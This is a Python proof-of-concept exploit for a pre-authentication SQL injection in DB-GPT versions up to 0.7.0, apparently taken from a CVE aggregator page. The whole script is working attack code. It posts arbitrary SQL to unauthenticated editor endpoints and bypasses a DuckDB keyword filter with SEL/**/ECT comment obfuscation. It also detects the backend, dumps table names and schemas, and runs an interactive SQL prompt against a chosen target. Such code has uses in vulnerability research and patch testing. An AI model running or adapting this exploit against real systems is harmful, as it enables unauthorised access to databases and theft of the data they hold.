5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exp.py PY
#!/usr/bin/env python3
"""
CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection
Affected: eosphoros-ai/DB-GPT <= 0.7.0
Endpoint: /api/v1/editor/sql/run, /api/v1/editor/chart/run
Type: Pre-Auth SQL Injection (bypass of CVE-2024-10835 / CVE-2024-10901 fix)

The sanitize_sql blacklist only covers DuckDB. MySQL/PostgreSQL/SQLite
connections pass raw SQL directly to query_ex() with no filtering.
DuckDB blacklist can be bypassed with comment obfuscation (SEL/**/ECT).

Usage:
    python3 exp.py <target> <db_name> [--sql "SELECT ..."]
    python3 exp.py <target> <db_name> --dump-tables
    python3 exp.py <target> <db_name> --dump-db
    python3 exp.py <target> --list-dbs
"""

import argparse
import json
import sys

import requests


def sql_run(target, db_name, sql):
    """POST *sql* to the editor SQL-run endpoint and return its result table.

    Args:
        target: Base URL of the service; a trailing slash is tolerated.
        db_name: Name of the configured database to run against.
        sql: Statement text, sent as-is in the JSON body.

    Returns:
        ``(columns, values)`` taken from the response's ``data`` object when
        the response reports success; ``(None, None)`` when the server
        reports failure or when anything raises (network error, non-JSON
        body, unexpected response shape). Failures are described on stderr.
    """
    endpoint = target.rstrip("/") + "/api/v1/editor/sql/run"
    body = {"db_name": db_name, "sql": sql}
    try:
        reply = requests.post(endpoint, json=body, timeout=30).json()
        if not reply.get("success"):
            print(f"[-] Error: {reply.get('err_msg', 'unknown')}", file=sys.stderr)
            return None, None
        table = reply.get("data", {})
        # NOTE(review): "colunms" (sic) is the key this client reads;
        # presumably it mirrors the server's response schema — confirm
        # against the API before "correcting" the spelling.
        return table.get("colunms", []), table.get("values", [])
    except Exception as exc:
        # Deliberately broad: any failure is reported and turned into the
        # (None, None) sentinel that callers test for.
        print(f"[-] Request failed: {exc}", file=sys.stderr)
        return None, None


def chart_run(target, db_name, sql, chart_type="bar"):
    """POST *sql* to the editor chart-run endpoint and return its ``data``.

    Args:
        target: Base URL of the service; a trailing slash is tolerated.
        db_name: Name of the configured database to run against.
        sql: Statement text, sent as-is in the JSON body.
        chart_type: Value sent in the ``chart_type`` field (default ``"bar"``).

    Returns:
        The response's ``data`` value (``{}`` if the key is absent) when the
        response reports success; ``None`` when the server reports failure
        or when anything raises. Failures are described on stderr.
    """
    endpoint = target.rstrip("/") + "/api/v1/editor/chart/run"
    body = {"db_name": db_name, "sql": sql, "chart_type": chart_type}
    try:
        reply = requests.post(endpoint, json=body, timeout=30).json()
        if not reply.get("success"):
            print(f"[-] Error: {reply.get('err_msg', 'unknown')}", file=sys.stderr)
            return None
        return reply.get("data", {})
    except Exception as exc:
        # Deliberately broad: any failure is reported and mapped to None.
        print(f"[-] Request failed: {exc}", file=sys.stderr)
        return None


def list_databases(target):
    """GET the editor database list from *target*.

    Args:
        target: Base URL of the service; a trailing slash is tolerated.

    Returns:
        The response's ``data`` value (``[]`` if the key is absent) when the
        response reports success, otherwise ``None``. A server-reported
        failure is silent; an exception is described on stderr.
    """
    endpoint = target.rstrip("/") + "/api/v1/editor/db/list"
    try:
        reply = requests.get(endpoint, timeout=10).json()
        return reply.get("data", []) if reply.get("success") else None
    except Exception as exc:
        # Deliberately broad: any failure is reported and mapped to None.
        print(f"[-] Request failed: {exc}", file=sys.stderr)
        return None


def print_table(columns, values):
    """Print a result set to stdout as an aligned, pipe-separated table.

    Output is a header line, a ``-+-`` separator line, one line per row,
    then a blank line and a ``(N rows)`` footer. Nothing is printed when
    *columns* is empty or ``None``.

    Args:
        columns: Sequence of column names.
        values: Iterable of rows, each a sequence of cell values. ``None``
            is treated as "no rows".
    """
    if not columns:
        return

    def render(cell):
        # Only a genuine null becomes "NULL"; falsy data such as 0, 0.0,
        # False and "" must be shown as-is.
        return "NULL" if cell is None else str(cell)

    rows = [[render(cell) for cell in row] for row in (values or [])]
    headers = [str(name) for name in columns]

    # A row may carry more cells than there are column names; pad the header
    # with blanks so every cell has a width slot instead of raising IndexError.
    n_cols = max([len(headers)] + [len(row) for row in rows])
    headers += [""] * (n_cols - len(headers))

    widths = [len(name) for name in headers]
    for row in rows:
        for i, cell in enumerate(row):
            widths[i] = max(widths[i], len(cell))

    print(" | ".join(name.ljust(w) for name, w in zip(headers, widths)))
    print("-+-".join("-" * w for w in widths))
    for row in rows:
        print(" | ".join(cell.ljust(w) for cell, w in zip(row, widths)))
    print(f"\n({len(rows)} rows)")


def detect_db_type(target, db_name):
    """Classify the backend behind *db_name* from its version string.

    Args:
        target: Base URL of the service.
        db_name: Name of the configured database to probe.

    Returns:
        One of ``"postgresql"``, ``"mariadb"``, ``"mysql"``, ``"sqlite"``
        or ``"unknown"``.
    """
    # VERSION() exists on MySQL, MariaDB and PostgreSQL, so one probe covers
    # all three. The branches are ordered most-specific first, because a
    # PostgreSQL version string also contains dots and would otherwise be
    # classified as MySQL by the generic "." test.
    cols, vals = sql_run(target, db_name, "SELECT VERSION()")
    if cols and vals and vals[0]:  # guard against an empty first row
        version = str(vals[0][0]).lower()
        if "postgresql" in version:
            return "postgresql"
        if "mariadb" in version:
            return "mariadb"
        if "." in version:
            return "mysql"

    # SQLite has no VERSION(); it exposes sqlite_version() instead.
    cols, vals = sql_run(target, db_name, "SELECT sqlite_version()")
    if cols and vals:
        return "sqlite"

    return "unknown"


def main():
    """Parse the command line and run exactly one mode.

    Modes are checked in this order, and each returns when it finishes:
    ``--list-dbs``, ``--sql``, ``--dump-tables``, ``--dump-db``; if none is
    given, an interactive prompt loop runs until ``exit``, an empty line,
    EOF or Ctrl-C. Every mode except ``--list-dbs`` requires ``db_name``.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection"
    )
    parser.add_argument("target", help="Target URL (e.g. http://localhost:5670)")
    # Optional positional so that --list-dbs can be used without it; the
    # requirement is enforced manually below.
    parser.add_argument("db_name", nargs="?", help="Database name")
    parser.add_argument("--sql", help="Custom SQL to execute")
    parser.add_argument(
        "--list-dbs", action="store_true", help="List available databases"
    )
    parser.add_argument(
        "--dump-tables", action="store_true", help="Dump table names"
    )
    parser.add_argument(
        "--dump-db", action="store_true", help="Dump all table structures"
    )
    # NOTE(review): args.chart is never read anywhere in this function and
    # chart_run() is not called from here, so this flag currently has no
    # effect.
    parser.add_argument(
        "--chart", action="store_true", help="Use chart endpoint instead"
    )
    parser.add_argument(
        "--duckdb-bypass",
        action="store_true",
        help="Use comment obfuscation for DuckDB",
    )
    args = parser.parse_args()

    print(f"[*] CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection")
    print(f"[*] Target: {args.target}")

    # --- Mode: list databases (the only mode that does not need db_name) ---
    if args.list_dbs:
        dbs = list_databases(args.target)
        if dbs:
            print(f"\n[+] Found {len(dbs)} database(s):")
            for db in dbs:
                # Entries may be dicts or plain values; a non-dict entry is
                # printed as-is with an unknown type.
                name = db.get("db_name", db) if isinstance(db, dict) else db
                db_type = db.get("db_type", "?") if isinstance(db, dict) else "?"
                print(f"    - {name} ({db_type})")
        else:
            # Covers None (failure) and an empty list alike.
            print("[-] No databases found or endpoint not accessible")
        return

    if not args.db_name:
        # parser.error() prints usage and exits the process.
        parser.error("db_name is required unless using --list-dbs")

    # --- Mode: run one user-supplied statement ---
    if args.sql:
        sql = args.sql
        if args.duckdb_bypass:
            # Literal, case-sensitive replacement of the uppercase keyword.
            sql = sql.replace("SELECT", "SEL/**/ECT")
        print(f"[*] Executing: {sql}\n")
        cols, vals = sql_run(args.target, args.db_name, sql)
        # Nothing is printed when cols is None or empty; on failure sql_run
        # has already written the reason to stderr.
        if cols:
            print_table(cols, vals)
        return

    # --- Mode: list table names ---
    # NOTE(review): --duckdb-bypass is not applied in this mode or in
    # --dump-db; only --sql and the interactive loop honour it.
    if args.dump_tables:
        db_type = detect_db_type(args.target, args.db_name)
        print(f"[*] Detected DB type: {db_type}")

        # Pick the catalog query that matches the detected backend.
        if db_type in ("mysql", "mariadb"):
            sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE()"
        elif db_type == "postgresql":
            sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public'"
        elif db_type == "sqlite":
            sql = "SELECT name FROM sqlite_master WHERE type='table'"
        else:
            # Unknown backend: unfiltered information_schema query.
            sql = "SELECT table_name FROM information_schema.tables"

        print(f"[*] Dumping tables...\n")
        cols, vals = sql_run(args.target, args.db_name, sql)
        if cols:
            print_table(cols, vals)
        return

    # --- Mode: list every table's columns and types ---
    if args.dump_db:
        db_type = detect_db_type(args.target, args.db_name)
        print(f"[*] Detected DB type: {db_type}")

        if db_type in ("mysql", "mariadb"):
            sql = (
                "SELECT table_name, column_name, data_type "
                "FROM information_schema.columns "
                "WHERE table_schema = DATABASE() "
                "ORDER BY table_name, ordinal_position"
            )
        elif db_type == "postgresql":
            sql = (
                "SELECT table_name, column_name, data_type "
                "FROM information_schema.columns "
                "WHERE table_schema = 'public' "
                "ORDER BY table_name, ordinal_position"
            )
        elif db_type == "sqlite":
            # SQLite: get tables first, then PRAGMA for each
            cols, vals = sql_run(
                args.target,
                args.db_name,
                "SELECT name FROM sqlite_master WHERE type='table'",
            )
            if cols and vals:
                for row in vals:
                    table = row[0]
                    print(f"\n[*] Table: {table}")
                    # The table name is interpolated unescaped; a name
                    # containing a single quote would break this statement.
                    tc, tv = sql_run(
                        args.target,
                        args.db_name,
                        f"PRAGMA table_info('{table}')",
                    )
                    if tc:
                        print_table(tc, tv)
            # The SQLite path prints per-table output itself and skips the
            # shared "Dumping schema" query below.
            return
        else:
            # Unknown backend: unfiltered, unordered information_schema query.
            sql = "SELECT table_name, column_name, data_type FROM information_schema.columns"

        print(f"[*] Dumping schema...\n")
        cols, vals = sql_run(args.target, args.db_name, sql)
        if cols:
            print_table(cols, vals)
        return

    # Default: interactive mode
    print(f"[*] Database: {args.db_name}")
    print(f"[*] Interactive SQL mode. Type 'exit' to quit.\n")
    while True:
        try:
            sql = input("SQL> ").strip()
        except (EOFError, KeyboardInterrupt):
            # Ctrl-D / Ctrl-C: finish the prompt line and leave the loop.
            print()
            break
        # An empty line ends the session too, not only "exit".
        if not sql or sql.lower() == "exit":
            break
        if args.duckdb_bypass:
            sql = sql.replace("SELECT", "SEL/**/ECT")
        cols, vals = sql_run(args.target, args.db_name, sql)
        if cols:
            print_table(cols, vals)
        print()


# Run the CLI only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()